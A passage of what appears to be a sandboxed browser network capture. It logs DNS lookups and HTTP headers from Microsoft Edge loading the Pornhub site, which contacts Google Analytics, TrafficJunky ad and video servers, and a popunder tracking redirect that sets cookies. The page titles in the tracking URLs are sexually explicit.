sec-fetch-dest: video
referer: https://a.adtng.com/
accept-language: en-US,en;q=0.9
range: bytes=0-

Response

HTTP/2.0 206

date: Sat, 05 Oct 2024 16:04:03 GMT
content-type: video/mp4
content-length: 666067
last-modified: Wed, 25 Sep 2024 15:59:07 GMT
etag: "a29d3-622f3b3ab28c0"
expires: Tue, 04 Feb 2025 00:12:10 GMT
cache-control: max-age=10573454
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
content-range: bytes 0-666066/666067
x-cdn-diag: lon1-16008-1-119169-h-0-0---;16032-58-559501----0-0-0
DNS

171.114.254.66.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.114.254.66.in-addr.arpa

IN PTR

Response

171.114.254.66.in-addr.arpa

IN PTR

reflectededge reflectednet
DNS

4.156.210.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.156.210.64.in-addr.arpa

IN PTR

Response
DNS

storage.googleapis.com

msedge.exe

Remote address:

8.8.8.8:53

Request

storage.googleapis.com

IN A

Response

storage.googleapis.com

IN A

142.250.179.251

storage.googleapis.com

IN A

142.250.187.219

storage.googleapis.com

IN A

216.58.213.27

storage.googleapis.com

IN A

142.250.187.251

storage.googleapis.com

IN A

216.58.212.251

storage.googleapis.com

IN A

216.58.212.219

storage.googleapis.com

IN A

142.250.178.27

storage.googleapis.com

IN A

172.217.169.27

storage.googleapis.com

IN A

216.58.201.123

storage.googleapis.com

IN A

142.250.200.27

storage.googleapis.com

IN A

216.58.204.91

storage.googleapis.com

IN A

142.250.180.27

storage.googleapis.com

IN A

172.217.16.251

storage.googleapis.com

IN A

172.217.169.59

storage.googleapis.com

IN A

142.250.200.59

storage.googleapis.com

IN A

172.217.169.91
GET

https://storage.googleapis.com/workbox-cdn/releases/5.1.3/workbox-sw.js

msedge.exe

Remote address:

142.250.179.251:443

Request

GET /workbox-cdn/releases/5.1.3/workbox-sw.js HTTP/2.0
host: storage.googleapis.com
cache-control: max-age=0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

251.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

251.179.250.142.in-addr.arpa

IN PTR

Response

251.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f271e100net
DNS

stats.g.doubleclick.net

msedge.exe

Remote address:

8.8.8.8:53

Request

stats.g.doubleclick.net

IN A

Response

stats.g.doubleclick.net

IN A

64.233.166.155

stats.g.doubleclick.net

IN A

64.233.166.154

stats.g.doubleclick.net

IN A

64.233.166.156

stats.g.doubleclick.net

IN A

64.233.166.157
DNS

analytics.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

analytics.google.com

IN A

Response

analytics.google.com

IN A

142.250.200.14
POST

https://analytics.google.com/g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je4a20v889308053za200zb892446692&_p=1728144239999&_gaz=1&gcs=G111&gcd=13r3r3l3l5l1&npa=0&dma=0&tag_exp=101671035~101747727~101794736&cid=1100938586.1728144242&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=noapi&_s=3&sid=1728144241&sct=1&seg=0&dl=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&dt=Free%20Porn%20Videos%20%26%20Sex%20Movies%20-%20Porno%2C%20XXX%2C%20Porn%20Tube%20%7C%20Pornhub&en=user_engagement&ep.login_user=No&ep.user_interface=pc&ep.content_group=homepage&ep.content_group_2=homepage&ep.shorties_orientation=straight&ep.referrer_group=external&ep.seo_tags_translation=0&ep.ga_temp_client_id=1100938586.1728144242&_et=4&tfd=6772

msedge.exe

Remote address:

142.250.200.14:443

Request

POST /g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je4a20v889308053za200zb892446692&_p=1728144239999&_gaz=1&gcs=G111&gcd=13r3r3l3l5l1&npa=0&dma=0&tag_exp=101671035~101747727~101794736&cid=1100938586.1728144242&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=noapi&_s=3&sid=1728144241&sct=1&seg=0&dl=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&dt=Free%20Porn%20Videos%20%26%20Sex%20Movies%20-%20Porno%2C%20XXX%2C%20Porn%20Tube%20%7C%20Pornhub&en=user_engagement&ep.login_user=No&ep.user_interface=pc&ep.content_group=homepage&ep.content_group_2=homepage&ep.shorties_orientation=straight&ep.referrer_group=external&ep.seo_tags_translation=0&ep.ga_temp_client_id=1100938586.1728144242&_et=4&tfd=6772 HTTP/2.0
host: analytics.google.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
POST

https://analytics.google.com/g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je4a20v889308053za200zb892446692&_p=1728144239999&gcs=G111&gcd=13r3r3l3l5l1&npa=0&dma=0&tag_exp=101671035~101747727~101794736&cid=1100938586.1728144242&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=noapi&_s=4&sid=1728144241&sct=1&seg=1&dl=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&dt=Free%20Porn%20Videos%20%26%20Sex%20Movies%20-%20Porno%2C%20XXX%2C%20Porn%20Tube%20%7C%20Pornhub&en=user_engagement&ep.login_user=No&ep.user_interface=pc&ep.content_group=homepage&ep.content_group_2=homepage&ep.shorties_orientation=straight&ep.referrer_group=external&ep.seo_tags_translation=0&_et=10989&tfd=17990

msedge.exe

Remote address:

142.250.200.14:443

Request

POST /g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je4a20v889308053za200zb892446692&_p=1728144239999&gcs=G111&gcd=13r3r3l3l5l1&npa=0&dma=0&tag_exp=101671035~101747727~101794736&cid=1100938586.1728144242&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=noapi&_s=4&sid=1728144241&sct=1&seg=1&dl=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&dt=Free%20Porn%20Videos%20%26%20Sex%20Movies%20-%20Porno%2C%20XXX%2C%20Porn%20Tube%20%7C%20Pornhub&en=user_engagement&ep.login_user=No&ep.user_interface=pc&ep.content_group=homepage&ep.content_group_2=homepage&ep.shorties_orientation=straight&ep.referrer_group=external&ep.seo_tags_translation=0&_et=10989&tfd=17990 HTTP/2.0
host: analytics.google.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
POST

https://analytics.google.com/g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je4a20v889308053z8892446692za200zb892446692&_p=1728144256638&gcs=G111&gcd=13t3t3l3l5l1&npa=0&dma=0&tag_exp=101671035~101747727~101794736&cid=1100938586.1728144242&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=noapi&_s=1&sid=1728144241&sct=1&seg=1&dl=https%3A%2F%2Fwww.pornhub.com%2Fview_video.php%3Fviewkey%3D66e6fe092a6e2&dr=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&dt=Fake%20Driving%20School%20-%20Test%20my%20TITS%20and%20then%20Fuck%20my%20ASS%20-%20Pornhub.com&en=page_view&ep.active=active&ep.hd_video=Yes&ep.language_spoken_in_video=English&ep.mpp_geo_blocked=Allowed&ep.paid_uviu_video=No&ep.pornstars_in_video=Ryan%20Ryder%2CBarbie%20Sins&ep.premium_thumbs=Yes&ep.premium_video=No&ep.up_id=5700661&ep.video_date_pubslihed=20240918&ep.video_duration=15&ep.video_geo_japan=No&ep.video_orientation=Straight&ep.video_player_version=8.1.0&ep.video_production=Professional&ep.video_reactivated=No&ep.video_segment=Straight&ep.video_uploader=Content%20Partner&ep.video_uploader_name=FakeHub&ep.dd_related_videos=pornhub.related_video.89&ep.dd_recommended_videos=No&ep.login_user=No&ep.user_interface=pc&ep.content_group=videos&ep.content_group_2=video&ep.referrer_group=homepage&ep.ms_translations=en_none&ep.seo_tags_translation=0&up.login_user=No&up.user_interface=pc&up.signup_experiment_value=all&up.orientation=straight&up.shorties_experiment_version=phase_1&up.shorties_exp_2=B&up.isp=Surf&up.connection_type=Corporate&up.seo_tags_translation_user=0&tfd=6120

msedge.exe

Remote address:

142.250.200.14:443

Request

POST /g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je4a20v889308053z8892446692za200zb892446692&_p=1728144256638&gcs=G111&gcd=13t3t3l3l5l1&npa=0&dma=0&tag_exp=101671035~101747727~101794736&cid=1100938586.1728144242&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=noapi&_s=1&sid=1728144241&sct=1&seg=1&dl=https%3A%2F%2Fwww.pornhub.com%2Fview_video.php%3Fviewkey%3D66e6fe092a6e2&dr=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&dt=Fake%20Driving%20School%20-%20Test%20my%20TITS%20and%20then%20Fuck%20my%20ASS%20-%20Pornhub.com&en=page_view&ep.active=active&ep.hd_video=Yes&ep.language_spoken_in_video=English&ep.mpp_geo_blocked=Allowed&ep.paid_uviu_video=No&ep.pornstars_in_video=Ryan%20Ryder%2CBarbie%20Sins&ep.premium_thumbs=Yes&ep.premium_video=No&ep.up_id=5700661&ep.video_date_pubslihed=20240918&ep.video_duration=15&ep.video_geo_japan=No&ep.video_orientation=Straight&ep.video_player_version=8.1.0&ep.video_production=Professional&ep.video_reactivated=No&ep.video_segment=Straight&ep.video_uploader=Content%20Partner&ep.video_uploader_name=FakeHub&ep.dd_related_videos=pornhub.related_video.89&ep.dd_recommended_videos=No&ep.login_user=No&ep.user_interface=pc&ep.content_group=videos&ep.content_group_2=video&ep.referrer_group=homepage&ep.ms_translations=en_none&ep.seo_tags_translation=0&up.login_user=No&up.user_interface=pc&up.signup_experiment_value=all&up.orientation=straight&up.shorties_experiment_version=phase_1&up.shorties_exp_2=B&up.isp=Surf&up.connection_type=Corporate&up.seo_tags_translation_user=0&tfd=6120 HTTP/2.0
host: analytics.google.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
POST

https://analytics.google.com/g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je4a20v889308053za200zb892446692&_p=1728144256638&_gaz=1&gcs=G111&gcd=13t3t3l3l5l1&npa=0&dma=0&tag_exp=101671035~101747727~101794736&cid=1100938586.1728144242&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=noapi&_s=2&sid=1728144241&sct=1&seg=1&dl=https%3A%2F%2Fwww.pornhub.com%2Fview_video.php%3Fviewkey%3D66e6fe092a6e2&dr=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&dt=Fake%20Driving%20School%20-%20Test%20my%20TITS%20and%20then%20Fuck%20my%20ASS%20-%20Pornhub.com&en=user_engagement&ep.active=active&ep.hd_video=Yes&ep.language_spoken_in_video=English&ep.mpp_geo_blocked=Allowed&ep.paid_uviu_video=No&ep.pornstars_in_video=Ryan%20Ryder%2CBarbie%20Sins&ep.premium_thumbs=Yes&ep.premium_video=No&ep.up_id=5700661&ep.video_date_pubslihed=20240918&ep.video_duration=15&ep.video_geo_japan=No&ep.video_orientation=Straight&ep.video_player_version=8.1.0&ep.video_production=Professional&ep.video_reactivated=No&ep.video_segment=Straight&ep.video_uploader=Content%20Partner&ep.video_uploader_name=FakeHub&ep.dd_related_videos=pornhub.related_video.89&ep.dd_recommended_videos=No&ep.login_user=No&ep.user_interface=pc&ep.content_group=videos&ep.content_group_2=video&ep.referrer_group=homepage&ep.ms_translations=en_none&ep.seo_tags_translation=0&_et=28100&tfd=56067

msedge.exe

Remote address:

142.250.200.14:443

Request

POST /g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je4a20v889308053za200zb892446692&_p=1728144256638&_gaz=1&gcs=G111&gcd=13t3t3l3l5l1&npa=0&dma=0&tag_exp=101671035~101747727~101794736&cid=1100938586.1728144242&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=noapi&_s=2&sid=1728144241&sct=1&seg=1&dl=https%3A%2F%2Fwww.pornhub.com%2Fview_video.php%3Fviewkey%3D66e6fe092a6e2&dr=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&dt=Fake%20Driving%20School%20-%20Test%20my%20TITS%20and%20then%20Fuck%20my%20ASS%20-%20Pornhub.com&en=user_engagement&ep.active=active&ep.hd_video=Yes&ep.language_spoken_in_video=English&ep.mpp_geo_blocked=Allowed&ep.paid_uviu_video=No&ep.pornstars_in_video=Ryan%20Ryder%2CBarbie%20Sins&ep.premium_thumbs=Yes&ep.premium_video=No&ep.up_id=5700661&ep.video_date_pubslihed=20240918&ep.video_duration=15&ep.video_geo_japan=No&ep.video_orientation=Straight&ep.video_player_version=8.1.0&ep.video_production=Professional&ep.video_reactivated=No&ep.video_segment=Straight&ep.video_uploader=Content%20Partner&ep.video_uploader_name=FakeHub&ep.dd_related_videos=pornhub.related_video.89&ep.dd_recommended_videos=No&ep.login_user=No&ep.user_interface=pc&ep.content_group=videos&ep.content_group_2=video&ep.referrer_group=homepage&ep.ms_translations=en_none&ep.seo_tags_translation=0&_et=28100&tfd=56067 HTTP/2.0
host: analytics.google.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
POST

https://stats.g.doubleclick.net/g/collect?v=2&tid=G-B39RFFWGYY&cid=1100938586.1728144242&gtm=45je4a20v889308053za200zb892446692&aip=1&dma=0&gcs=G111&gcd=13r3r3l3l5l1&npa=0&frm=0&tag_exp=101671035~101747727~101794736

msedge.exe

Remote address:

64.233.166.155:443

Request

POST /g/collect?v=2&tid=G-B39RFFWGYY&cid=1100938586.1728144242&gtm=45je4a20v889308053za200zb892446692&aip=1&dma=0&gcs=G111&gcd=13r3r3l3l5l1&npa=0&frm=0&tag_exp=101671035~101747727~101794736 HTTP/2.0
host: stats.g.doubleclick.net
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

14.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.200.250.142.in-addr.arpa

IN PTR

Response

14.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f141e100net
DNS

155.166.233.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.166.233.64.in-addr.arpa

IN PTR

Response

155.166.233.64.in-addr.arpa

IN PTR

wm-in-f1551e100net
DNS

ew.phncdn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ew.phncdn.com

IN A

Response

ew.phncdn.com

IN CNAME

ew.phncdn.com.sds.rncdn7.com

ew.phncdn.com.sds.rncdn7.com

IN A

64.210.156.20

ew.phncdn.com.sds.rncdn7.com

IN A

64.210.156.23

ew.phncdn.com.sds.rncdn7.com

IN A

64.210.156.16

ew.phncdn.com.sds.rncdn7.com

IN A

64.210.156.22

ew.phncdn.com.sds.rncdn7.com

IN A

64.210.156.17

ew.phncdn.com.sds.rncdn7.com

IN A

64.210.156.21

ew.phncdn.com.sds.rncdn7.com

IN A

64.210.156.19

ew.phncdn.com.sds.rncdn7.com

IN A

64.210.156.18
DNS

track.thuis.nl

msedge.exe

Remote address:

8.8.8.8:53

Request

track.thuis.nl

IN A

Response

track.thuis.nl

IN CNAME

d2uygswbxn8upw.cloudfront.net

d2uygswbxn8upw.cloudfront.net

IN A

18.172.88.11

d2uygswbxn8upw.cloudfront.net

IN A

18.172.88.78

d2uygswbxn8upw.cloudfront.net

IN A

18.172.88.39

d2uygswbxn8upw.cloudfront.net

IN A

18.172.88.47
DNS

cdn1d-static-shared.phncdn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

cdn1d-static-shared.phncdn.com

IN A

Response

cdn1d-static-shared.phncdn.com

IN CNAME

cdn1d-static-shared.phncdn.com.sds.rncdn7.com

cdn1d-static-shared.phncdn.com.sds.rncdn7.com

IN A

64.210.156.22

cdn1d-static-shared.phncdn.com.sds.rncdn7.com

IN A

64.210.156.18

cdn1d-static-shared.phncdn.com.sds.rncdn7.com

IN A

64.210.156.19

cdn1d-static-shared.phncdn.com.sds.rncdn7.com

IN A

64.210.156.23

cdn1d-static-shared.phncdn.com.sds.rncdn7.com

IN A

64.210.156.16

cdn1d-static-shared.phncdn.com.sds.rncdn7.com

IN A

64.210.156.21

cdn1d-static-shared.phncdn.com.sds.rncdn7.com

IN A

64.210.156.17

cdn1d-static-shared.phncdn.com.sds.rncdn7.com

IN A

64.210.156.20
GET

https://track.thuis.nl/b2b6dee2-f71a-46f0-83a8-1a6c621fe26d?CampaignID=1006851051&SpotName=Pornhub%20PC-%20Popunder&BLPName=&SiteName=Pornhub

msedge.exe

Remote address:

18.172.88.11:443

Request

GET /b2b6dee2-f71a-46f0-83a8-1a6c621fe26d?CampaignID=1006851051&SpotName=Pornhub%20PC-%20Popunder&BLPName=&SiteName=Pornhub HTTP/2.0
host: track.thuis.nl
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 302

content-length: 0
location: https://www.thuis.nl/tj/?utm_source=TrafficJunky&utm_medium=Advertising
date: Sat, 05 Oct 2024 16:04:18 GMT
server: nginx
cache-control: no-store, no-cache, pre-check=0, post-check=0
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
set-cookie: b2b6dee2-f71a-46f0-83a8-1a6c621fe26d-v4=dklZn9zMBNUTlqnDbbnrmHa4g3w2vxReO_z9OfrcDDo; Max-Age=86400; Expires=Sun, 06 Oct 2024 16:04:18 GMT; Domain=track.thuis.nl; Path=/; Secure; HttpOnly;SameSite=None
set-cookie: cc-v4=1aC3cie80BaQFayv7LYUZEIoAfVZuLit6o2IBdxiGSmdCQSzQBiyZljHo1cpe2sH4OY1dpj0FPQ7piztzDHCCrKNO5xjCZUATyxVM%2FbuEPL4r2Rk4zrMe8pvJuDdtaWubZHKjgKIU976V4rBnEX8fQ%3D%3D; Max-Age=31536000; Expires=Sun, 05 Oct 2025 16:04:18 GMT; Domain=track.thuis.nl; Path=/; Secure; HttpOnly;SameSite=None
x-cache: Miss from cloudfront
via: 1.1 7ec6907868e1c6722adeb757d0bd22c4.cloudfront.net (CloudFront)
x-amz-cf-pop: MAN51-P1
x-amz-cf-id: MVFJMrNEh1TS90k1o4jDbj0VizSqSs79OguE6g9K6HDb0FtjScnn9w==
DNS

11.88.172.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.88.172.18.in-addr.arpa

IN PTR

Response

11.88.172.18.in-addr.arpa

IN PTR

server-18-172-88-11man51r cloudfrontnet
GET

https://static.trafficjunky.com/invocation/idsync/production/idsync.min.js?v=1728086400000

msedge.exe

Remote address:

64.210.156.19:443

Request

GET /invocation/idsync/production/idsync.min.js?v=1728086400000 HTTP/2.0
host: static.trafficjunky.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:19 GMT
content-type: application/javascript
vary: Accept-Encoding
last-modified: Thu, 12 Sep 2024 15:41:37 GMT
etag: W/"8670adf54-d3d5-621edf1258e40"
expires: Sun, 12 Jan 2025 02:20:25 GMT
cache-control: max-age=1736648425
content-encoding: br
x-cdn-diag: lon1-16032-3-282545-h-0-0---;16009-833-10195----0-0-0
DNS

eg-cdn.trafficjunky.net

msedge.exe

Remote address:

8.8.8.8:53

Request

eg-cdn.trafficjunky.net

IN A

Response

eg-cdn.trafficjunky.net

IN CNAME

cs742.wpc.rncdn4.com

cs742.wpc.rncdn4.com

IN A

93.184.223.43
DNS

ht-cdn.trafficjunky.net

msedge.exe

Remote address:

8.8.8.8:53

Request

ht-cdn.trafficjunky.net

IN A

Response

ht-cdn.trafficjunky.net

IN CNAME

ht-cdn.trafficjunky.net.sds.rncdn7.com

ht-cdn.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.23

ht-cdn.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.21

ht-cdn.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.20

ht-cdn.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.18

ht-cdn.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.16

ht-cdn.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.22

ht-cdn.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.19

ht-cdn.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.17
DNS

etahub.com

msedge.exe

Remote address:

8.8.8.8:53

Request

etahub.com

IN A

Response

etahub.com

IN A

66.254.114.62
GET

https://eg-cdn.trafficjunky.net/uploaded_content/video/002/317/221/2317221_video.mp4

msedge.exe

Remote address:

93.184.223.43:443

Request

GET /uploaded_content/video/002/317/221/2317221_video.mp4 HTTP/2.0
host: eg-cdn.trafficjunky.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://www.pornhub.com/
accept-language: en-US,en;q=0.9
range: bytes=0-

Response

HTTP/2.0 206

accept-ranges: bytes
age: 1238488
cache-control: max-age=1737615262
content-range: bytes 0-338572/338573
content-type: video/mp4
date: Sat, 05 Oct 2024 16:04:19 GMT
etag: "84455844b-52a8d-62058f1405540"
expires: Thu, 06 Feb 2025 14:55:50 GMT
last-modified: Fri, 23 Aug 2024 12:30:37 GMT
server: ECAcc (amb/6B0B)
x-cache: HIT
x-ec-bbr-enable: 1
content-length: 338573
GET

https://eg-cdn.trafficjunky.net/uploaded_content/video/002/317/221/2317221_video.mp4

msedge.exe

Remote address:

93.184.223.43:443

Request

GET /uploaded_content/video/002/317/221/2317221_video.mp4 HTTP/2.0
host: eg-cdn.trafficjunky.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://www.pornhub.com/
accept-language: en-US,en;q=0.9
range: bytes=0-

Response

HTTP/2.0 206

accept-ranges: bytes
age: 1238489
cache-control: max-age=1737615262
content-range: bytes 0-338572/338573
content-type: video/mp4
date: Sat, 05 Oct 2024 16:04:20 GMT
etag: "84455844b-52a8d-62058f1405540"
expires: Thu, 06 Feb 2025 14:55:51 GMT
last-modified: Fri, 23 Aug 2024 12:30:37 GMT
server: ECAcc (amb/6B0B)
x-cache: HIT
x-ec-bbr-enable: 1
content-length: 338573
DNS

evtubescms.phncdn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

evtubescms.phncdn.com

IN A

Response

evtubescms.phncdn.com

IN CNAME

evtubescms.phncdn.com.lds.rncdn7.com

evtubescms.phncdn.com.lds.rncdn7.com

IN A

64.210.156.0

evtubescms.phncdn.com.lds.rncdn7.com

IN A

64.210.156.6

evtubescms.phncdn.com.lds.rncdn7.com

IN A

64.210.156.7

evtubescms.phncdn.com.lds.rncdn7.com

IN A

64.210.156.1

evtubescms.phncdn.com.lds.rncdn7.com

IN A

64.210.156.4

evtubescms.phncdn.com.lds.rncdn7.com

IN A

64.210.156.3

evtubescms.phncdn.com.lds.rncdn7.com

IN A

64.210.156.5

evtubescms.phncdn.com.lds.rncdn7.com

IN A

64.210.156.2
GET

https://etahub.com/events?app_id=10896&eventName=adroll_response&nosVersion=10&nstartPoint=0&nvd=900&nvid=457809091&nvt=1728144256&scampaignId=953201802&sfeatureName=adroll_response&sfeatureValue=campaign&sformat=json&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

msedge.exe

Remote address:

66.254.114.62:443

Request

